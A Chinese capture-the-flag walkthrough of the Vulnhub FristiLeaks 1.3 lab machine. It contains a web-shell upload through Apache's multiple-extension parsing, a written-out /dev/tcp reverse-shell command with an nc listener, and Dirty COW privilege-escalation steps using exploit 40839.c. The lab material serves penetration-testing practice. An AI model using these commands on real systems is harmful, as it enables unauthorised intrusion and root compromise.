Vulnhub靶机 Fristileaks 1.3(渗透测试详解)

一、配置靶机

1、靶机下载地址
https://www.vulnhub.com/entry/fristileaks-13,133/
2、根据靶机提示需要将MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到

3、登录获取靶机IP

二、Web渗透测试

1、对靶机IP进行端口和服务探测

2、访问靶机IP

没有功能点

3、对靶机进行目录扫描

拼接目录访问

经过一顿拼接访问,没啥子用

最后发现拼接主页的fristi可以到一个登录页面

经过一些弱口令、sql都没测出漏洞

4、查看源码信息

发现一个类似以名字结尾的后缀,可能是用户名

还有一串base64加密的值

经源码复制到111.txt中进行解密

发现是一张png格式的图片

5、查看图片内容

将解密的文件写入到一张图片中

base64 -d 111.txt > 1.png

查出来一段字符,很有可能是密码

6、尝试登录

账户:eezeepz 密码:kekkekkekkekkEKkEk

 

登录成功,有个上传文件功能点

7、尝试文件上传

尝试上传一句话木马

上传失败,只能上传png,jpg,gif格式文件

根据插件识别到该网站中间件为Apache httpd,可能存在Apache HTTPD 多后缀解析漏洞:在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件

更改文件后缀重新上传

根据翻译,成功上传

访问上传的一句话木马文件

成功解析,仪剑连接

8、进行反弹shell

仪剑进行虚拟终端执行命令

0<&196;exec 196<>/dev/tcp/192.168.31.128/5555; sh <&196 >&196 2>&196

kali监听

nc -lvvp 5555

成功反弹

9、获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

三、提权

1、利用脏牛提权

使用uname -a 查看系统的内核版本

直接使用经典的脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统

2、查找脏牛版本
searchsploit 'Dirty COW'

3、选取40839.c,并将其导入下来
searchsploit -m 40839.c

4、开启一个临时服务
python3 -m http.server

5、wget远程下载脏牛脚本

6、给脚本文件加执行权限
chmod +x 40839.c

7、编译并执行文件
gcc -pthread 40839.c -o 40839 -lcrypt
./40839

提示需要设置一个新密码,随便设

8、查看etc下是否存在firefart用户

9、切换到firefart用户

切记,这儿的密码是自己前面设置的密码

提权成功!!!到此结束!!!

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值